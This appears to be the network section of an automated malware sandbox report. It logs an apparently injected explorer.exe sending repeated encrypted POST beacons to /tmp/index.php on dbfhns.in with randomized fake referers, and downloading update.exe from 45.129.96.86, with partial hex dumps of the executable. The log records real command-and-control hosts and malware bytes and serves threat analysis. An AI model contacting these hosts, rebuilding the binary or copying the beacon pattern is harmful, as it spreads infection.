                                                          May 27, 2024 00:27:14.005548954 CEST308OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 38 dd 90
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA .[k,vuZ8iuGv`a"5Un/5WBRBlJJ\y\@2N0}DUmABMrR<qS'2z)rY%P:@#,/
                                                          May 27, 2024 00:27:14.993361950 CEST152INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:14 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 04 00 00 00 72 e8 85 ec
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.549712187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:15.022691011 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://gitrvlonrfqrq.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 358
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:15.022710085 CEST358OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 63 0d ed 85
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vucM~s4F+Dt8:P|W\BmK\s5c'MU!4!.CKQ!EABy|vY|F_`<ob
                                                          May 27, 2024 00:27:16.009608984 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:15 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.549713187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:16.337150097 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ltjhtqaytuwkyt.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 301
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:16.337188005 CEST301OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 4b 46 bd a7
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vuKFTko,pLB,o=_SnElMNOB[I[FWLB?$K)iAvcD>bcz?Bgqd;>Xu
                                                          May 27, 2024 00:27:17.349195957 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:17 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.549714187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:17.401782990 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://rjjvubikquby.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 259
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:17.401809931 CEST259OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 37 2f bc 88
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vu7/(`D1WVA|XE2/A]!^IGhOdj{:NOsg:qLs"1u}-GvOK7
                                                          May 27, 2024 00:27:18.533272982 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:18 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.549715187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:18.565315008 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://ctkjptrcxdnjtm.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 191
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:18.565335035 CEST191OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 3c 0c f9 fd
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vu<O]P_4d.1^"|xC)!x-3CKUJ5xe$$%a)q-F
                                                          May 27, 2024 00:27:19.546773911 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:19 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.549716187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:19.578145027 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://eisoaquivduh.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 201
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:19.578180075 CEST201OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 60 18 c2 ff
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA -[k,vu`YXXcGh 0dn6y@X;LALN~0NFLYX0,
                                                          May 27, 2024 00:27:20.562275887 CEST191INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:20 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1
                                                          Data Ascii: #\-^$aD++3^|


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.54971745.129.96.86801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:20.576462984 CEST165OUTGET /file/update.exe HTTP/1.1
                                                          Connection: Keep-Alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Host: 45.129.96.86
                                                          May 27, 2024 00:27:21.278526068 CEST1236INHTTP/1.1 200 OK
                                                          Server: nginx/1.22.1
                                                          Date: Sun, 26 May 2024 22:27:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 325120
                                                          Last-Modified: Sun, 26 May 2024 22:20:02 GMT
                                                          Connection: keep-alive
                                                          ETag: "6653b592-4f600"
                                                          Accept-Ranges: bytes
                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 [TRUNCATED]
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$[7:Y:Y:Yh:Yh:Yh:YB:Y:X:Y1:Yh:Y1:YRich:YPELct= @pdHx@ d.text3 `.rdatal n@@.dataF~@.rsrcL@@
                                                          May 27, 2024 00:27:21.279771090 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 24 c5 48 00 e8 27 02 00 00 68 29 1b 41 00 e8 0f 24 00 00 59 c3 b9 2c c5 48 00 e8 7a 02 00 00 68 1f 1b 41
                                                          Data Ascii: $H'h)A$Y,HzhA#YHhA#Yj HjHj(HjHUQQQQ$]EYY]UQQQQ$$]EYY]UE]
                                                          May 27, 2024 00:27:21.286313057 CEST1236INData Raw: 89 45 e4 8b 4d e8 8b c3 d3 e8 89 45 f8 8b 45 d4 01 45 f8 8b 45 f8 33 45 e4 31 45 fc 8b 45 fc 29 45 ec 8b 4d d0 81 c7 47 86 c8 61 89 7d f0 4e 0f 85 29 ff ff ff 8b 75 cc 8b 45 ec 5f 89 5e 04 89 06 5e 5b 8b e5 5d c3 56 8b 35 08 c5 48 00 c1 ee 03 57
                                                          Data Ascii: EMEEEE3E1EE)EMGa}N)uE_^^[]V5HW=HtNu_^UQeEEH]USSV3W=$ AS8q Fr|HAKQSHHd AMHQj@
                                                          May 27, 2024 00:27:21.286324978 CEST1236INData Raw: 59 18 81 44 24 20 f4 2a 9d 04 81 44 24 30 ea 66 bb 37 81 44 24 14 40 02 87 21 b8 3d d8 cd 38 f7 64 24 1c 8b 44 24 1c 81 6c 24 0c 1a 75 11 74 b8 31 7a bb 79 f7 64 24 1c 8b 44 24 1c 81 6c 24 30 ff 4d 18 6e 81 44 24 20 6c 8f e2 39 b8 b9 1b f5 11 f7
                                                          Data Ascii: YD$ *D$0f7D$@!=8d$D$l$ut1zyd$D$l$0MnD$ l9d$D$l$l$k`l$09D$$^l$?OsRZd$D$<-md$,D$,l$/l$8|BD$+_D$`0D$$PM'"d$ D$ fpmd$PD$PD$,EAl$<eACj02
                                                          May 27, 2024 00:27:21.289170027 CEST1236INData Raw: 56 e8 d4 00 00 00 eb 2b 80 7d 0c 00 74 19 83 fe 10 73 14 8b 47 10 8b cf 3b f0 0f 42 c6 50 6a 01 e8 2f fe ff ff eb 0c 85 f6 75 08 56 8b cf e8 87 ff ff ff 33 c0 3b c6 5f 1b c0 f7 d8 5e 5d c2 08 00 8b cf e8 31 00 00 00 cc 55 8b ec 83 7d 08 00 57 8b
                                                          Data Ascii: V+}tsG;BPj/uV3;_^]1U}WtI9Er=G;Ev2_]hxAhxAU]faayrUQEPN3B;HF]ASVuWe
                                                          May 27, 2024 00:27:21.291573048 CEST1236INData Raw: f9 80 00 00 00 0f 82 ce 01 00 00 8b c7 33 c6 a9 0f 00 00 00 75 0e 0f ba 25 18 90 41 00 01 0f 82 da 04 00 00 0f ba 25 30 5e 44 00 00 0f 83 a7 01 00 00 f7 c7 03 00 00 00 0f 85 b8 01 00 00 f7 c6 03 00 00 00 0f 85 97 01 00 00 0f ba e7 02 73 0d 8b 06
                                                          Data Ascii: 3u%A%0^Dsvs~vftcfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}vfoNvIfo^0f
                                                          May 27, 2024 00:27:21.291584969 CEST1236INData Raw: 47 02 8b 44 24 0c 5e 5f c3 90 8a 46 03 88 47 03 8a 46 02 88 47 02 8a 46 01 88 47 01 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 57 8b c6 83 e0 0f 85 c0 0f 85 d2 00 00 00 8b d1 83 e1 7f c1 ea 07 74 65 8d a4 24 00 00 00 00 90 66 0f 6f 06 66 0f 6f 4e
                                                          Data Ascii: GD$^_FGFGFGD$^_$Wte$fofoNfoV fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJutOtfofvJut*tvIutFGIu
                                                          May 27, 2024 00:27:21.294320107 CEST1236INData Raw: 8f f0 8b 44 8e f4 89 44 8f f4 8b 44 8e f8 89 44 8f f8 8b 44 8e fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 f8 2c 40 00 8b ff 08 2d 40 00 10 2d 40 00 1c 2d 40 00 30 2d 40 00 8b 44 24 0c 5e 5f c3 90 8a 06 88 07 8b 44 24 0c 5e 5f c3 90
                                                          Data Ascii: DDDDDD$,@-@-@-@0-@D$^_D$^_FGD$^_IFGFGD$^_t1|9u$r$.@$D.@Ir+$-@$.@-@-@-@F#Gr
                                                          May 27, 2024 00:27:21.294348955 CEST1236INData Raw: 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1
                                                          Data Ascii: ~3tAt2t$ttAL$+AL$+AL$+AL$+W|$n$L$Wtt=u~3tAt#tttyyyyL$ttf
                                                          May 27, 2024 00:27:21.300221920 CEST1236INData Raw: 4c 24 04 dd 44 24 04 c3 d9 ee c3 66 0f c2 1d 90 30 41 00 01 66 0f 56 1d 90 30 41 00 66 0f 54 1d 80 30 41 00 66 0f d6 5c 24 04 dd 44 24 04 c3 55 8b ec 56 8b 75 08 8b 46 0c a8 83 75 10 e8 85 12 00 00 c7 00 16 00 00 00 83 c8 ff eb 6e 53 8b 5d 10 83
                                                          Data Ascii: L$D$f0AfV0AfT0Af\$D$UVuFunS]FWuV-}3Y}V2FYyFttuFSWV%-YP03_[A^]jh~Ae3uul<}
                                                          May 27, 2024 00:27:21.300234079 CEST1236INData Raw: 9c 68 c0 21 41 00 68 b0 21 41 00 e8 bb fe ff ff 59 59 68 c8 21 41 00 68 c4 21 41 00 e8 aa fe ff ff 59 59 c7 45 fc fe ff ff ff e8 20 00 00 00 83 7d 10 00 75 29 c7 05 ec 5d 44 00 01 00 00 00 6a 08 e8 3b 32 00 00 59 ff 75 08 e8 5c fd ff ff 83 7d 10
                                                          Data Ascii: h!Ah!AYYh!Ah!AYYE }u)]Dj;2Yu\}tj%2Y|Ujju]Uu:Ytu%AYt]jEE/APMh}AEE/APjhA:2jKYMZf9@t


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.549718187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:22.060745955 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://wbiuottwvhtdjd.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 328
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:22.060791016 CEST328OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2c 5b 0e 6b 2c 90 f4 76 0b 75 23 25 bc eb
                                                          Data Ascii: ;nRkVt|n}Eo_.$j?#1|J7 M@NA ,[k,vu#%}Uj[lXr#2Hg1CB^/!z-b :&~htsUBOM}bwHwI.NMGl~,F%
                                                          May 27, 2024 00:27:23.039649010 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sun, 26 May 2024 22:27:22 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.549719187.143.58.5801028C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          May 27, 2024 00:27:24.492005110 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://eevetcrfdfleqxq.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 187
                                                          Host: dbfhns.in
                                                          May 27, 2024 00:27:24.492027998 CEST187OUTData Raw: 3b 6e 52 16 85 bf 6b 56 ab df c8 0b 74 09 0b be 7c 09 bc 90 6e 03 e3 15 0c 09 7d 9c 45 b3 c2 6f 9b 5f b6 2e 03 19 24 6a 9b 96 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 7a 54 fb 82
